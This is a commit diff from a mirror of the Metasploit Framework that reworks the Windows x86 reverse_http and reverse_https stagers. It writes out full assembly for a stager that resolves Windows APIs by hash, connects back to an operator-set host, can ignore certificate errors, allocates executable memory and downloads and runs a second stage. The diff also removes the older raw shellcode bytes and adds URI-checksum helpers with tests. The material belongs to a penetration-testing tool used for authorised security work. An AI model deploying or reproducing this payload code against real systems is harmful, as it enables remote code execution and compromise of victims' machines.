infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #4904, @hmoore-r7 reworks reverse_http/s stagers 

They are now assembled dynamically and support more flexible options,
such as long URLs.
bug/bundler_fix
Brent Cook 2015-03-11 10:41:59 -05:00
parent 02c7461d32 1d17e9ab5b
commit ceeee4446f
No known key found for this signature in database
GPG Key ID: 1FFAA0B24B708F96
10 changed files with 649 additions and 126 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

34
lib/msf/core/handler/reverse_http/uri_checksum.rb
View File

@ -76,8 +76,11 @@ module Msf
# Create a URI that matches a given checksum # Create a URI that matches a given checksum
# #
# @param sum [Fixnum] The checksum value you are trying to create a URI for # @param sum [Fixnum] The checksum value you are trying to create a URI for
# @param len [Fixnum] An optional length value for the created URI
# @return [String] The URI string that checksums to the given value # @return [String] The URI string that checksums to the given value
def generate_uri_checksum(sum) def generate_uri_checksum(sum,len=nil)
return generate_uri_checksum_with_length(sum, len) if len
chk = ("a".."z").to_a + ("A".."Z").to_a + ("0".."9").to_a chk = ("a".."z").to_a + ("A".."Z").to_a + ("0".."9").to_a
32.times do 32.times do
uri = Rex::Text.rand_text_alphanumeric(3) uri = Rex::Text.rand_text_alphanumeric(3)
@ -90,6 +93,35 @@ module Msf
return URI_CHECKSUM_PRECALC[sum] return URI_CHECKSUM_PRECALC[sum]
end end
# Create an arbitrary length URI that matches a given checksum
#
# @param sum [Fixnum] The checksum value you are trying to create a URI for
# @param len [Fixnum] The length of the created URI
# @return [String] The URI string that checksums to the given value
def generate_uri_checksum_with_length(sum, len)
# Lengths shorter than 4 bytes are unable to match all possible checksums
# Lengths of exactly 4 are relatively slow to find for high checksum values
# Lengths of 5 or more bytes find a matching checksum fairly quickly (~80ms)
raise ArgumentError, "Length must be 5 bytes or greater" if len < 5
# Funny enough, this was more efficient than calculating checksum offsets
if len < 40
loop do
uri = Rex::Text.rand_text_alphanumeric(len)
return uri if Rex::Text.checksum8(uri) == sum
end
end
# The rand_text_alphanumeric() method becomes a bottleneck at around 40 bytes
# Calculating a static prefix flattens out the average runtime for longer URIs
prefix = Rex::Text.rand_text_alphanumeric(len-20)
loop do
uri = prefix + Rex::Text.rand_text_alphanumeric(20)
return uri if Rex::Text.checksum8(uri) == sum
end
end
end end
end end
end end

7
lib/msf/core/payload/windows.rb
View File

@ -150,5 +150,12 @@ module Msf::Payload::Windows
return true return true
end end
#
# Share the EXITFUNC mappings with other classes
#
def self.exit_types
@@exit_types.dup
end
end end

112
lib/msf/core/payload/windows/block_api.rb Normal file
View File

@ -0,0 +1,112 @@
# -*- coding: binary -*-
require 'msf/core'
module Msf
###
#
# Basic block_api stubs for Windows ARCH_X86 payloads
#
###
module Payload::Windows::BlockApi
def asm_block_api(opts={})
raw = %q^
api_call:
pushad ; We preserve all the registers for the caller, bar EAX and ECX.
mov ebp, esp ; Create a new stack frame
xor eax, eax ; Zero EAX (upper 3 bytes will remain zero until function is found)
mov edx, [fs:eax+48] ; Get a pointer to the PEB
mov edx, [edx+12] ; Get PEB->Ldr
mov edx, [edx+20] ; Get the first module from the InMemoryOrder module list
next_mod: ;
mov esi, [edx+40] ; Get pointer to modules name (unicode string)
movzx ecx, word [edx+38] ; Set ECX to the length we want to check
xor edi, edi ; Clear EDI which will store the hash of the module name
loop_modname: ;
lodsb ; Read in the next byte of the name
cmp al, 'a' ; Some versions of Windows use lower case module names
jl not_lowercase ;
sub al, 0x20 ; If so normalise to uppercase
not_lowercase: ;
ror edi, 13 ; Rotate right our hash value
add edi, eax ; Add the next byte of the name
loop loop_modname ; Loop untill we have read enough
; We now have the module hash computed
push edx ; Save the current position in the module list for later
push edi ; Save the current module hash for later
; Proceed to iterate the export address table
mov edx, [edx+16] ; Get this modules base address
mov ecx, [edx+60] ; Get PE header
; use ecx as our EAT pointer here so we can take advantage of jecxz.
mov ecx, [ecx+edx+120] ; Get the EAT from the PE header
jecxz get_next_mod1 ; If no EAT present, process the next module
add ecx, edx ; Add the modules base address
push ecx ; Save the current modules EAT
mov ebx, [ecx+32] ; Get the rva of the function names
add ebx, edx ; Add the modules base address
mov ecx, [ecx+24] ; Get the number of function names
; now ecx returns to its regularly scheduled counter duties
; Computing the module hash + function hash
get_next_func: ;
jecxz get_next_mod ; When we reach the start of the EAT (we search backwards), process the next module
dec ecx ; Decrement the function name counter
mov esi, [ebx+ecx*4] ; Get rva of next module name
add esi, edx ; Add the modules base address
xor edi, edi ; Clear EDI which will store the hash of the function name
; And compare it to the one we want
loop_funcname: ;
lodsb ; Read in the next byte of the ASCII function name
ror edi, 13 ; Rotate right our hash value
add edi, eax ; Add the next byte of the name
cmp al, ah ; Compare AL (the next byte from the name) to AH (null)
jne loop_funcname ; If we have not reached the null terminator, continue
add edi, [ebp-8] ; Add the current module hash to the function hash
cmp edi, [ebp+36] ; Compare the hash to the one we are searchnig for
jnz get_next_func ; Go compute the next function hash if we have not found it
; If found, fix up stack, call the function and then value else compute the next one...
pop eax ; Restore the current modules EAT
mov ebx, [eax+36] ; Get the ordinal table rva
add ebx, edx ; Add the modules base address
mov cx, [ebx+2*ecx] ; Get the desired functions ordinal
mov ebx, [eax+28] ; Get the function addresses table rva
add ebx, edx ; Add the modules base address
mov eax, [ebx+4*ecx] ; Get the desired functions RVA
add eax, edx ; Add the modules base address to get the functions actual VA
; We now fix up the stack and perform the call to the desired function...
finish:
mov [esp+36], eax ; Overwrite the old EAX value with the desired api address for the upcoming popad
pop ebx ; Clear off the current modules hash
pop ebx ; Clear off the current position in the module list
popad ; Restore all of the callers registers, bar EAX, ECX and EDX which are clobbered
pop ecx ; Pop off the origional return address our caller will have pushed
pop edx ; Pop off the hash value our caller will have pushed
push ecx ; Push back the correct return value
jmp eax ; Jump into the required function
; We now automagically return to the correct caller...
get_next_mod: ;
pop edi ; Pop off the current (now the previous) modules EAT
get_next_mod1: ;
pop edi ; Pop off the current (now the previous) modules hash
pop edx ; Restore our position in the module list
mov edx, [edx] ; Get the next module
jmp.i8 next_mod ; Process this module
^
end
end
end

79
lib/msf/core/payload/windows/exitfunk.rb Normal file
View File

@ -0,0 +1,79 @@
# -*- coding: binary -*-
require 'msf/core'
require 'msf/core/payload/windows'
module Msf
###
#
# Implements arbitrary exit routines for Windows ARCH_X86 payloads
#
###
module Payload::Windows::Exitfunk
def asm_exitfunk(opts={})
asm = "exitfunk:\n"
case opts[:exitfunk]
when 'seh'
asm << %Q^
mov ebx, #{"0x%.8x" % Msf::Payload::Windows.exit_types['seh']}
push.i8 0 ; push the exit function parameter
push ebx ; push the hash of the exit function
call ebp ; SetUnhandledExceptionFilter(0)
push.i8 0
ret ; Return to NULL (crash)
^
# On Windows Vista, Server 2008, and newer, it is not possible to call ExitThread
# on WoW64 processes, instead we need to call RtlExitUserThread. This stub will
# automatically generate the right code depending on the selected exit method.
when 'thread'
asm << %Q^
mov ebx, #{"0x%.8x" % Msf::Payload::Windows.exit_types['thread']}
push 0x9DBD95A6 ; hash( "kernel32.dll", "GetVersion" )
call ebp ; GetVersion(); (AL will = major version and AH will = minor version)
cmp al, 6 ; If we are not running on Windows Vista, 2008 or 7
jl exitfunk_goodbye ; Then just call the exit function...
cmp bl, 0xE0 ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7...
jne exitfunk_goodbye ;
mov ebx, 0x6F721347 ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
exitfunk_goodbye: ; We now perform the actual call to the exit function
push.i8 0 ; push the exit function parameter
push ebx ; push the hash of the exit function
call ebp ; call ExitThread(0) || RtlExitUserThread(0)
^
when 'process', nil
asm << %Q^
mov ebx, #{"0x%.8x" % Msf::Payload::Windows.exit_types['process']}
push.i8 0 ; push the exit function parameter
push ebx ; push the hash of the exit function
call ebp ; ExitProcess(0)
^
when 'sleep'
asm << %Q^
mov ebx, #{"0x%.8x" % Rex::Text.ror13_hash('Sleep')}
push 300000 ; 300 seconds
push ebx ; push the hash of the function
call ebp ; Sleep(300000)
jmp exitfunk ; repeat
^
else
# Do nothing and continue after the end of the shellcode
end
asm
end
end
end

333
lib/msf/core/payload/windows/reverse_http.rb Normal file
View File

@ -0,0 +1,333 @@
# -*- coding: binary -*-
require 'msf/core'
require 'msf/core/payload/windows/block_api'
require 'msf/core/payload/windows/exitfunk'
module Msf
###
#
# Complex payload generation for Windows ARCH_X86 that speak HTTP(S)
#
###
module Payload::Windows::ReverseHttp
include Msf::Payload::Windows::BlockApi
include Msf::Payload::Windows::Exitfunk
#
# Register reverse_http specific options
#
def initialize(*args)
super
register_advanced_options(
[
OptInt.new('HTTPStagerURILength', [false, 'The URI length for the stager (at least 5 bytes)'])
], self.class)
end
#
# Generate the first stage
#
def generate
# Generate the simple version of this stager if we don't have enough space
if self.available_space.nil? || required_space > self.available_space
return generate_reverse_http(
ssl: false,
host: datastore['LHOST'],
port: datastore['LPORT'],
url: "/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW))
end
conf = {
ssl: false,
host: datastore['LHOST'],
port: datastore['LPORT'],
url: generate_uri,
exitfunk: datastore['EXITFUNC']
}
generate_reverse_http(conf)
end
#
# Generate and compile the stager
#
def generate_reverse_http(opts={})
combined_asm = %Q^
cld ; Clear the direction flag.
call start ; Call start, this pushes the address of 'api_call' onto the stack.
#{asm_block_api}
start:
pop ebp
#{asm_reverse_http(opts)}
^
Metasm::Shellcode.assemble(Metasm::X86.new, combined_asm).encode_string
end
#
# Generate the URI for the initial stager
#
def generate_uri
uri_req_len = datastore['HTTPStagerURILength'].to_i
# Choose a random URI length between 30 and 255 bytes
if uri_req_len == 0
uri_req_len = 30 + rand(256-30)
end
if uri_req_len < 5
raise ArgumentError, "Minimum HTTPStagerURILength is 5"
end
"/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW, uri_req_len)
end
#
# Determine the maximum amount of space required for the features requested
#
def required_space
# Start with our cached default generated size
space = cached_size
# Add 100 bytes for the encoder to have some room
space += 100
# Make room for the maximum possible URL length
space += 256
# EXITFUNK processing adds 31 bytes at most (for ExitThread, only ~16 for others)
space += 31
# The final estimated size
space
end
#
# Dynamic payload generation
#
def asm_reverse_http(opts={})
#
# options should contain:
# ssl: (true|false)
# url: "/url_to_request"
# host: [hostname]
# port: [port]
# exitfunk: [process|thread|seh|sleep]
#
http_open_flags = 0
if opts[:ssl]
#;0x80000000 | ; INTERNET_FLAG_RELOAD
#;0x04000000 | ; INTERNET_NO_CACHE_WRITE
#;0x00400000 | ; INTERNET_FLAG_KEEP_CONNECTION
#;0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT
#;0x00000200 | ; INTERNET_FLAG_NO_UI
#;0x00800000 | ; INTERNET_FLAG_SECURE
#;0x00002000 | ; INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
#;0x00001000 ; INTERNET_FLAG_IGNORE_CERT_CN_INVALID
http_open_flags = ( 0x80000000 | 0x04000000 | 0x00400000 | 0x00200000 | 0x00000200 | 0x00800000 | 0x00002000 | 0x00001000 )
else
#;0x80000000 | ; INTERNET_FLAG_RELOAD
#;0x04000000 | ; INTERNET_NO_CACHE_WRITE
#;0x00400000 | ; INTERNET_FLAG_KEEP_CONNECTION
#;0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT
#;0x00000200 ; INTERNET_FLAG_NO_UI
http_open_flags = ( 0x80000000 | 0x04000000 | 0x00400000 | 0x00200000 | 0x00000200 )
end
asm = %Q^
;-----------------------------------------------------------------------------;
; Author: HD Moore
; Compatible: Confirmed Windows 7, Windows 2008 Server, Windows XP SP1, Windows SP3, Windows 2000
; Known Bugs: Incompatible with Windows NT 4.0, buggy on Windows XP Embedded (SP1)
; Version: 1.0
;-----------------------------------------------------------------------------;
; Input: EBP must be the address of 'api_call'.
; Output: EDI will be the socket for the connection to the server
; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0)
load_wininet:
push 0x0074656e ; Push the bytes 'wininet',0 onto the stack.
push 0x696e6977 ; ...
push esp ; Push a pointer to the "wininet" string on the stack.
push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" )
call ebp ; LoadLibraryA( "wininet" )
set_retry:
push.i8 8 ; retry 8 times should be enough
pop edi
xor ebx, ebx ; push 8 zeros ([1]-[8])
mov ecx, edi
push_zeros:
push ebx
loop push_zeros
internetopen:
; DWORD dwFlags [1]
; LPCTSTR lpszProxyBypass (NULL) [2]
; LPCTSTR lpszProxyName (NULL) [3]
; DWORD dwAccessType (PRECONFIG = 0) [4]
; LPCTSTR lpszAgent (NULL) [5]
push 0xA779563A ; hash( "wininet.dll", "InternetOpenA" )
call ebp
internetconnect:
; DWORD_PTR dwContext (NULL) [6]
; dwFlags [7]
push.i8 3 ; DWORD dwService (INTERNET_SERVICE_HTTP)
push ebx ; password (NULL)
push ebx ; username (NULL)
push #{opts[:port]} ; PORT
call got_server_uri ; double call to get pointer for both server_uri and
server_uri: ; server_host; server_uri is saved in EDI for later
db "#{opts[:url]}", 0x00
got_server_host:
push eax ; HINTERNET hInternet
push 0xC69F8957 ; hash( "wininet.dll", "InternetConnectA" )
call ebp
httpopenrequest:
; dwContext (NULL) [8]
push #{"0x%.8x" % http_open_flags} ; dwFlags
push ebx ; accept types
push ebx ; referrer
push ebx ; version
push edi ; server URI
push ebx ; method
push eax ; hConnection
push 0x3B2E55EB ; hash( "wininet.dll", "HttpOpenRequestA" )
call ebp
xchg esi, eax ; save hHttpRequest in esi
send_request:
^
if opts[:ssl]
asm << %Q^
; InternetSetOption (hReq, INTERNET_OPTION_SECURITY_FLAGS, &dwFlags, sizeof (dwFlags) );
set_security_options:
push 0x00003380
;0x00002000 | ; SECURITY_FLAG_IGNORE_CERT_DATE_INVALID
;0x00001000 | ; SECURITY_FLAG_IGNORE_CERT_CN_INVALID
;0x00000200 | ; SECURITY_FLAG_IGNORE_WRONG_USAGE
;0x00000100 | ; SECURITY_FLAG_IGNORE_UNKNOWN_CA
;0x00000080 ; SECURITY_FLAG_IGNORE_REVOCATION
mov eax, esp
push.i8 4 ; sizeof(dwFlags)
push eax ; &dwFlags
push.i8 31 ; DWORD dwOption (INTERNET_OPTION_SECURITY_FLAGS)
push esi ; hHttpRequest
push 0x869E4675 ; hash( "wininet.dll", "InternetSetOptionA" )
call ebp
^
end
asm << %Q^
httpsendrequest:
push ebx ; lpOptional length (0)
push ebx ; lpOptional (NULL)
push ebx ; dwHeadersLength (0)
push ebx ; lpszHeaders (NULL)
push esi ; hHttpRequest
push 0x7B18062D ; hash( "wininet.dll", "HttpSendRequestA" )
call ebp
test eax,eax
jnz allocate_memory
try_it_again:
dec edi
jnz send_request
; if we didn't allocate before running out of retries, bail out
^
if opts[:exitfunk]
asm << %Q^
failure:
call exitfunk
^
else
asm << %Q^
failure:
push 0x56A2B5F0 ; hardcoded to exitprocess for size
call ebp
^
end
asm << %Q^
allocate_memory:
push.i8 0x40 ; PAGE_EXECUTE_READWRITE
push 0x1000 ; MEM_COMMIT
push 0x00400000 ; Stage allocation (4Mb ought to do us)
push ebx ; NULL as we dont care where the allocation is
push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" )
call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
download_prep:
xchg eax, ebx ; place the allocated base address in ebx
push ebx ; store a copy of the stage base address on the stack
push ebx ; temporary storage for bytes read count
mov edi, esp ; &bytesRead
download_more:
push edi ; &bytesRead
push 8192 ; read length
push ebx ; buffer
push esi ; hRequest
push 0xE2899612 ; hash( "wininet.dll", "InternetReadFile" )
call ebp
test eax,eax ; download failed? (optional?)
jz failure
mov eax, [edi]
add ebx, eax ; buffer += bytes_received
test eax,eax ; optional?
jnz download_more ; continue until it returns 0
pop eax ; clear the temporary storage
execute_stage:
ret ; dive into the stored stage address
got_server_uri:
pop edi
call got_server_host
server_host:
db "#{opts[:host]}", 0x00
^
if opts[:exitfunk]
asm << asm_exitfunk(opts)
end
asm
end
#
# Do not transmit the stage over the connection. We handle this via HTTPS
#
def stage_over_connection?
false
end
#
# Always wait at least 20 seconds for this payload (due to staging delays)
#
def wfs_delay
20
end
end
end

63
lib/msf/core/payload/windows/reverse_https.rb Normal file
View File

@ -0,0 +1,63 @@
# -*- coding: binary -*-
require 'msf/core'
require 'msf/core/payload/windows/reverse_http'
module Msf
###
#
# Complex payload generation for Windows ARCH_X86 that speak HTTPS
#
###
module Payload::Windows::ReverseHttps
include Msf::Payload::Windows::ReverseHttp
#
# Generate and compile the stager
#
def generate_reverse_https(opts={})
combined_asm = %Q^
cld ; Clear the direction flag.
call start ; Call start, this pushes the address of 'api_call' onto the stack.
#{asm_block_api}
start:
pop ebp
#{asm_reverse_http(opts)}
^
Metasm::Shellcode.assemble(Metasm::X86.new, combined_asm).encode_string
end
#
# Generate the first stage
#
def generate
# Generate the simple version of this stager if we don't have enough space
if self.available_space.nil? || required_space > self.available_space
return generate_reverse_https(
host: datastore['LHOST'],
port: datastore['LPORT'],
url: "/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW),
ssl: true)
end
conf = {
ssl: true,
host: datastore['LHOST'],
port: datastore['LPORT'],
url: generate_uri,
exitfunk: datastore['EXITFUNC']
}
generate_reverse_https(conf)
end
end
end

69
modules/payloads/stagers/windows/reverse_http.rb
View File

@ -6,14 +6,15 @@
require 'msf/core' require 'msf/core'
require 'msf/core/handler/reverse_http' require 'msf/core/handler/reverse_http'
require 'msf/core/payload/windows/reverse_http'
module Metasploit3 module Metasploit3
CachedSize = 322 CachedSize = 306
include Msf::Payload::Stager include Msf::Payload::Stager
include Msf::Payload::Windows include Msf::Payload::Windows
include Msf::Payload::Windows::ReverseHttp
def initialize(info = {}) def initialize(info = {})
super(merge_info(info, super(merge_info(info,
@ -24,68 +25,6 @@ module Metasploit3
'Platform' => 'win', 'Platform' => 'win',
'Arch' => ARCH_X86, 'Arch' => ARCH_X86,
'Handler' => Msf::Handler::ReverseHttp, 'Handler' => Msf::Handler::ReverseHttp,
'Convention' => 'sockedi http', 'Convention' => 'sockedi http'))
'Stager' =>
{
'Offsets' =>
{
# Disabled since it MUST be ExitProcess to work on WoW64 unless we add EXITFUNK support (too big right now)
# 'EXITFUNC' => [ 240, 'V' ],
'LPORT' => [ 177, 'v' ], # Not a typo, really little endian
},
'Payload' =>
"\xFC\xE8\x82\x00\x00\x00\x60\x89\xE5\x31\xC0\x64\x8B\x50\x30\x8B" +
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\xAC\x3C" +
"\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF2\x52\x57\x8B\x52" +
"\x10\x8B\x4A\x3C\x8B\x4C\x11\x78\xE3\x48\x01\xD1\x51\x8B\x59\x20" +
"\x01\xD3\x8B\x49\x18\xE3\x3A\x49\x8B\x34\x8B\x01\xD6\x31\xFF\xAC" +
"\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF6\x03\x7D\xF8\x3B\x7D\x24\x75" +
"\xE4\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C\x4B\x8B\x58\x1C\x01\xD3" +
"\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B\x5B\x61\x59\x5A\x51\xFF" +
"\xE0\x5F\x5F\x5A\x8B\x12\xEB\x8D\x5D\x68\x6E\x65\x74\x00\x68\x77" +
"\x69\x6E\x69\x54\x68\x4C\x77\x26\x07\xFF\xD5\x6A\x08\x5F\x31\xDB" +
"\x89\xF9\x53\xE2\xFD\x68\x3A\x56\x79\xA7\xFF\xD5\x6A\x03\x53\x53" +
"\x68\x5C\x11\x00\x00\xE8\x72\x00\x00\x00\x2F\x31\x32\x33\x34\x35" +
"\x00\x50\x68\x57\x89\x9F\xC6\xFF\xD5\x68\x00\x02\x60\x84\x53\x53" +
"\x53\x57\x53\x50\x68\xEB\x55\x2E\x3B\xFF\xD5\x96\x53\x53\x53\x53" +
"\x56\x68\x2D\x06\x18\x7B\xFF\xD5\x85\xC0\x75\x0A\x4F\x75\xED\x68" +
"\xF0\xB5\xA2\x56\xFF\xD5\x6A\x40\x68\x00\x10\x00\x00\x68\x00\x00" +
"\x40\x00\x53\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x53\x89\xE7\x57" +
"\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xE2\xFF\xD5\x85\xC0" +
"\x74\xCD\x8B\x07\x01\xC3\x85\xC0\x75\xE5\x58\xC3\x5F\xE8\x8F\xFF" +
"\xFF\xFF"
}
))
end
#
# Do not transmit the stage over the connection. We handle this via HTTPS
#
def stage_over_connection?
false
end
#
# Generate the first stage
#
def generate
p = super
i = p.index("/12345\x00")
u = "/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW) + "\x00"
p[i, u.length] = u
lhost = datastore['LHOST'] || '127.127.127.127'
if Rex::Socket.is_ipv6?(lhost)
lhost = "[#{lhost}]"
end
p + lhost + "\x00"
end
#
# Always wait at least 20 seconds for this payload (due to staging delays)
#
def wfs_delay
20
end end
end end

63
modules/payloads/stagers/windows/reverse_https.rb
View File

@ -6,14 +6,16 @@
require 'msf/core' require 'msf/core'
require 'msf/core/handler/reverse_https' require 'msf/core/handler/reverse_https'
require 'msf/core/payload/windows/reverse_https'
module Metasploit3 module Metasploit3
CachedSize = 327 CachedSize = 326
include Msf::Payload::Stager include Msf::Payload::Stager
include Msf::Payload::Windows include Msf::Payload::Windows
include Msf::Payload::Windows::ReverseHttps
def initialize(info = {}) def initialize(info = {})
super(merge_info(info, super(merge_info(info,
@ -24,64 +26,7 @@ module Metasploit3
'Platform' => 'win', 'Platform' => 'win',
'Arch' => ARCH_X86, 'Arch' => ARCH_X86,
'Handler' => Msf::Handler::ReverseHttps, 'Handler' => Msf::Handler::ReverseHttps,
'Convention' => 'sockedi https', 'Convention' => 'sockedi https'))
'Stager' =>
{
'Offsets' =>
{
# Disabled since it MUST be ExitProcess to work on WoW64 unless we add EXITFUNK support (too big right now)
# 'EXITFUNC' => [ 260, 'V' ],
'LPORT' => [ 177, 'v' ], # Not a typo, really little endian
},
'Payload' =>
"\xFC\xE8\x82\x00\x00\x00\x60\x89\xE5\x31\xC0\x64\x8B\x50\x30\x8B" +
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\xAC\x3C" +
"\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF2\x52\x57\x8B\x52" +
"\x10\x8B\x4A\x3C\x8B\x4C\x11\x78\xE3\x48\x01\xD1\x51\x8B\x59\x20" +
"\x01\xD3\x8B\x49\x18\xE3\x3A\x49\x8B\x34\x8B\x01\xD6\x31\xFF\xAC" +
"\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF6\x03\x7D\xF8\x3B\x7D\x24\x75" +
"\xE4\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C\x4B\x8B\x58\x1C\x01\xD3" +
"\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B\x5B\x61\x59\x5A\x51\xFF" +
"\xE0\x5F\x5F\x5A\x8B\x12\xEB\x8D\x5D\x68\x6E\x65\x74\x00\x68\x77" +
"\x69\x6E\x69\x54\x68\x4C\x77\x26\x07\xFF\xD5\x6A\x08\x5F\x31\xDB" +
"\x89\xF9\x53\xE2\xFD\x68\x3A\x56\x79\xA7\xFF\xD5\x6A\x03\x53\x53" +
"\x68\x5C\x11\x00\x00\xE8\x86\x00\x00\x00\x2F\x31\x32\x33\x34\x35" +
"\x00\x50\x68\x57\x89\x9F\xC6\xFF\xD5\x68\x00\x32\xE0\x84\x53\x53" +
"\x53\x57\x53\x50\x68\xEB\x55\x2E\x3B\xFF\xD5\x96\x68\x80\x33\x00" +
"\x00\x89\xE0\x6A\x04\x50\x6A\x1F\x56\x68\x75\x46\x9E\x86\xFF\xD5" +
"\x53\x53\x53\x53\x56\x68\x2D\x06\x18\x7B\xFF\xD5\x85\xC0\x75\x0A" +
"\x4F\x75\xD9\x68\xF0\xB5\xA2\x56\xFF\xD5\x6A\x40\x68\x00\x10\x00" +
"\x00\x68\x00\x00\x40\x00\x53\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53" +
"\x53\x89\xE7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xE2" +
"\xFF\xD5\x85\xC0\x74\xCD\x8B\x07\x01\xC3\x85\xC0\x75\xE5\x58\xC3" +
"\x5F\xE8\x7B\xFF\xFF\xFF"
}
))
end end
#
# Do not transmit the stage over the connection. We handle this via HTTPS
#
def stage_over_connection?
false
end
#
# Generate the first stage
#
def generate
p = super
i = p.index("/12345\x00")
u = "/" + generate_uri_checksum(Msf::Handler::ReverseHttps::URI_CHECKSUM_INITW) + "\x00"
p[i, u.length] = u
p + datastore['LHOST'].to_s + "\x00"
end
#
# Always wait at least 20 seconds for this payload (due to staging delays)
#
def wfs_delay
20
end
end end

2
modules/payloads/stagers/windows/x64/reverse_https.rb
View File

@ -6,7 +6,7 @@
require 'msf/core' require 'msf/core'
require 'msf/core/handler/reverse_https' require 'msf/core/handler/reverse_https'
#require 'msf/core/payload/windows/x64/reverse_https'
module Metasploit3 module Metasploit3

13
spec/lib/msf/core/handler/reverse_http/uri_checksum_spec.rb
View File

@ -9,6 +9,7 @@ describe Msf::Handler::ReverseHttp::UriChecksum do
subject(:dummy_object) { DummyClass.new } subject(:dummy_object) { DummyClass.new }
it { should respond_to :generate_uri_checksum} it { should respond_to :generate_uri_checksum}
it { should respond_to :generate_uri_checksum_with_length}
it { should respond_to :process_uri_resource} it { should respond_to :process_uri_resource}
describe '#generate_uri_checksum' do describe '#generate_uri_checksum' do
@ -28,6 +29,18 @@ describe Msf::Handler::ReverseHttp::UriChecksum do
end end
end end
describe '#generate_uri_checksum_with_length' do
[0, 80, 88, 90, 92, 98, 255, 127].each do |checksum_value|
[5,30,50,100,127].each do |uri_length|
it "generates a #{uri_length} byte string that checksums back to the original value (#{checksum_value})" do
uri_string = dummy_object.generate_uri_checksum_with_length(checksum_value, uri_length)
expect(Rex::Text.checksum8(uri_string)).to eq checksum_value
end
end
end
end
describe '#process_uri_resource' do describe '#process_uri_resource' do
context 'when passed a value for INITW' do context 'when passed a value for INITW' do
let(:uri) { "/7E37v"} let(:uri) { "/7E37v"}